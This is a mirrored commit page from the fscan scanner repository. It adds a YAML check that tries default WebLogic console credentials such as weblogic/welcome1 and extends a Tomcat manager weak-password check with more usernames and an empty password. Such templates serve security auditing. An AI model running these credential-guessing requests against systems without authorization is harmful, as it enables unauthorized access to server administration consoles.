mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 13:22:35 +08:00
commit
ceb585d018
29
WebScan/pocs/poc-yaml-weblogic-console-weak.yml
Normal file
29
WebScan/pocs/poc-yaml-weblogic-console-weak.yml
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
name: poc-yaml-weblogic-console-weak
|
||||||
|
sets:
|
||||||
|
username:
|
||||||
|
- weblogic
|
||||||
|
password:
|
||||||
|
- weblogic
|
||||||
|
- weblogic1
|
||||||
|
- welcome1
|
||||||
|
- Oracle@123
|
||||||
|
- weblogic123
|
||||||
|
payload:
|
||||||
|
- UTF-8
|
||||||
|
rules:
|
||||||
|
- method: HEAD
|
||||||
|
path: /console/j_security_check
|
||||||
|
follow_redirects: false
|
||||||
|
expression: |
|
||||||
|
response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
|
||||||
|
- method: POST
|
||||||
|
path: /console/j_security_check
|
||||||
|
follow_redirects: false
|
||||||
|
headers:
|
||||||
|
Content-type: application/x-www-form-urlencoded
|
||||||
|
body: |
|
||||||
|
j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
|
||||||
|
expression: |
|
||||||
|
!response.body.bcontains(b"LoginForm.jsp")
|
||||||
|
detail:
|
||||||
|
author: shadown1ng(https://github.com/shadown1ng)
|
@ -1,12 +1,16 @@
|
|||||||
name: poc-yaml-tomcat-manager-week
|
name: poc-yaml-tomcat-manager-weak
|
||||||
sets:
|
sets:
|
||||||
username:
|
username:
|
||||||
- tomcat
|
- tomcat
|
||||||
- admin
|
- admin
|
||||||
|
- root
|
||||||
|
- manager
|
||||||
password:
|
password:
|
||||||
- tomcat
|
- ""
|
||||||
- admin
|
- admin
|
||||||
|
- tomcat
|
||||||
- 123456
|
- 123456
|
||||||
|
- root
|
||||||
payload:
|
payload:
|
||||||
- base64(username+":"+password)
|
- base64(username+":"+password)
|
||||||
rules:
|
rules:
|
Loading…
Reference in New Issue
Block a user